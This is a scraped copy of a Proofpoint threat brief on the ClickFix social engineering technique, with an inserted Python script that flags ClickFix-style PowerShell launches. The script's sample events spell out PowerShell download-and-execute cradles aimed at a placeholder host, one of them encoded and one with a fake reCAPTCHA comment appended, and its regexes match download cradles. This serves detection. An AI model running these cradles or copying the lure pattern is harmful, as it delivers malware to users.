Source |
ProofPoint |
Identifier |
8613359 |
Publication date |
2024-11-18 10:34:05 (viewed: 2024-11-18 10:07:38) |
Title |
Security Brief: ClickFix Social Engineering Technique Floods Threat Landscape |
Text |
What happened
Proofpoint researchers have identified an increase in a unique social engineering technique called ClickFix. And the lures are getting even more clever.
Initially observed earlier this year in campaigns from the initial access broker TA571 and from a fake-update website-compromise threat cluster known as ClearFake, the ClickFix technique, which attempts to lure unsuspecting users into copying and running PowerShell to download malware, is now far more popular across the threat landscape.
The ClickFix social engineering technique uses dialog boxes containing fake error messages to trick people into copying, pasting, and running malicious content on their own computer.
Example of early ClickFix technique used by ClearFake.
Proofpoint has observed threat actors impersonating various software and services using the ClickFix technique as part of their social engineering, including common enterprise software such as Microsoft Word and Google Chrome, as well as software specifically observed in target environments such as transportation and logistics.
The ClickFix technique is used by multiple different threat actors and can originate from compromised websites, documents, HTML attachments, malicious URLs, and other delivery vectors. In most cases, when directed to the malicious URL or file, users are shown a dialog box claiming that an error occurred while opening a document or webpage. The dialog box includes instructions that appear to describe how to “fix” the problem, but the page will either automatically copy a malicious script for the user to paste into the PowerShell terminal or the Windows Run dialog box, where it eventually runs via PowerShell, or instruct the user to open PowerShell manually and paste in the provided command.
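The execution chain just described (a user pastes a clipboard-supplied command into the Run dialog or a PowerShell window, which then fetches and runs a payload) leaves a recognisable footprint in process-creation telemetry. The following Python triage script is an added example written for this brief, not Proofpoint code and not taken from any campaign; it scores process-creation events for the combination of traits the brief describes. The event field names (`image`, `parent_image`, `cmdline`, `pid`), the rule weights, the threshold, the `payload.invalid` URLs and the verification-themed comment text are all constructed assumptions. Treating a PowerShell process whose parent is `explorer.exe` as a likely Run-dialog or shortcut launch is a heuristic, not a certainty.

```python
"""Heuristic triage of process-creation events for ClickFix-style PowerShell launches.

Added example (not from the original brief). Looks for PowerShell started
interactively with a hidden window, policy bypass, an encoded or download-cradle
command, and a verification-themed trailing comment. All sample events below
are constructed for illustration, not real telemetry.
"""
import base64
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed script body, base64/UTF-16LE encoded the way -EncodedCommand expects.
_CONSTRUCTED_SCRIPT = "iex (New-Object Net.WebClient).DownloadString('http://payload.invalid/x')"
_ENCODED = base64.b64encode(_CONSTRUCTED_SCRIPT.encode("utf-16le")).decode("ascii")

# Constructed process-creation events (simplified Sysmon Event ID 1 style fields).
SAMPLE_EVENTS = [
    # 101: an administrator running a cmdlet from a console; should not be flagged.
    {"pid": 101, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "powershell.exe -NoProfile -Command Get-Service"},
    # 102: Run-dialog style launch with a download cradle and a verification-themed comment.
    {"pid": 102, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": "powershell.exe -w hidden -ep bypass -c \"iex (iwr 'http://payload.invalid/a.ps1' "
                "-UseBasicParsing)\" # \"I am not a robot - reCAPTCHA Verification ID: 0000\""},
    # 103: same launch pattern, but the cradle is hidden inside an encoded command.
    {"pid": 103, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": f"powershell.exe -nop -w hidden -enc {_ENCODED}"},
    # 104: a user simply opening a PowerShell console from the Start menu.
    {"pid": 104, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe", "cmdline": "powershell.exe"},
    # 105: not PowerShell at all; skipped.
    {"pid": 105, "image": r"C:\Windows\System32\notepad.exe",
     "parent_image": r"C:\Windows\explorer.exe", "cmdline": "notepad.exe"},
]

POWERSHELL_IMAGES = ("powershell.exe", "pwsh.exe")

# (rule name, weight, regex) applied case-insensitively to the command line plus any decoded payload.
RULES = [
    ("hidden_window", 2, r"-w(?:indowstyle)?\s+hidden\b"),
    ("execution_policy_bypass", 1, r"-e(?:p|x|xec|xecutionpolicy)\s+bypass\b"),
    ("no_profile", 1, r"(?<!\S)-nop(?:rofile)?\b"),
    ("encoded_command", 1, r"(?<!\S)-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}"),
    ("download_cradle", 3, r"\b(?:iwr|invoke-webrequest|irm|invoke-restmethod|downloadstring|"
                           r"downloadfile|net\.webclient|start-bitstransfer)\b"),
    # The brief notes a fake reCAPTCHA message appended to the copied command; the wording is assumed.
    ("verification_lure_comment", 3, r"#[^\r\n]*(?:captcha|robot|verif|human)"),
]


@dataclass
class Finding:
    pid: int
    score: int
    reasons: List[str]
    command: str  # decoded payload when present, otherwise the raw command line


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the UTF-16LE script behind -e/-ec/-enc/-EncodedCommand, or None."""
    m = re.search(r"(?<!\S)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_event(event: dict) -> Optional[Finding]:
    """Score one event; None when the image is not a PowerShell host."""
    image = event["image"].rsplit("\\", 1)[-1].lower()
    if image not in POWERSHELL_IMAGES:
        return None
    cmdline = event["cmdline"]
    decoded = decode_encoded_command(cmdline)
    text = cmdline if decoded is None else cmdline + "\n" + decoded
    reasons, score = [], 0
    parent = event["parent_image"].rsplit("\\", 1)[-1].lower()
    if parent == "explorer.exe":  # Run dialog / shortcut launches are children of explorer.exe
        reasons.append("interactive_launch_from_explorer")
        score += 1
    for name, weight, pattern in RULES:
        if re.search(pattern, text, re.I):
            reasons.append(name)
            score += weight
    return Finding(event["pid"], score, reasons, decoded or cmdline)


def triage(events: List[dict], threshold: int = 4) -> List[Finding]:
    """Return findings at or above the threshold, highest score first."""
    found = [f for f in map(score_event, events) if f is not None and f.score >= threshold]
    return sorted(found, key=lambda f: f.score, reverse=True)


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"pid={f.pid} score={f.score} reasons={','.join(f.reasons)}\n  {f.command}")
```

Only the two constructed ClickFix-style launches (pids 102 and 103) cross the threshold; the administrator's `-NoProfile` console and the bare interactive `powershell.exe` each trip a single low-weight rule and stay below it. The point of decoding `-enc` before scoring is that the cradle in event 103 is invisible on the raw command line.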
Proofpoint has observed ClickFix campaigns leading to malware including AsyncRAT, Danabot, DarkGate, Lumma Stealer, NetSupport, and more.
ClickFix campaigns observed March through October 2024.
Notably, threat actors have recently been observed using a fake CAPTCHA-themed ClickFix technique that pretends to validate the user with a "Verify You Are Human" (CAPTCHA) check. Much of the activity is based on an open-source toolkit named reCAPTCHA Phish, available on GitHub for “educational purposes.” The tool was released in mid-September by a security researcher, and Proofpoint began observing it in email threat data just days later. The purpose of the repository was to demonstrate a similar technique used by threat actors since August 2024 on websites related to video streaming. Ukraine CERT recently published details on a suspected Russian espionage actor using the fake CAPTCHA ClickFix technique in campaigns targeting government entities in Ukraine.
Recent examples
GitHub “Security Vulnerability” notifications
On 18 September 2024, Proofpoint researchers identified a campaign using GitHub notifications to deliver malware. The messages were notifications for GitHub activity. The threat actor either commented on or created an issue in a GitHub repository. If the repository owner, issue owner, or other relevant collaborators had email notifications enabled, they received an email notification containing the content of the comment or issue from GitHub. This campaign was publicly reported by security journalist Brian Krebs.
Email from GitHub.
The notification impersonated a security warning from GitHub and included a link to a fake GitHub website. The fake website used the reCAPTCHA Phish and ClickFix social engineering technique to trick users into executing a PowerShell command on their computer.
ClickFix-style “verification steps” to execute PowerShell.
The landing page contained a fake reCAPTCHA message at the end of the copied command so the target would not see the actual malicious command in the run-box when the malicious command was pasted. If the user performed the requested steps, PowerShell code was execu |
Notes |
★★
|
Sent |
Yes |
Tags |
Malware
Tool
Threat
|
Stories |
ChatGPT
|
Move |
|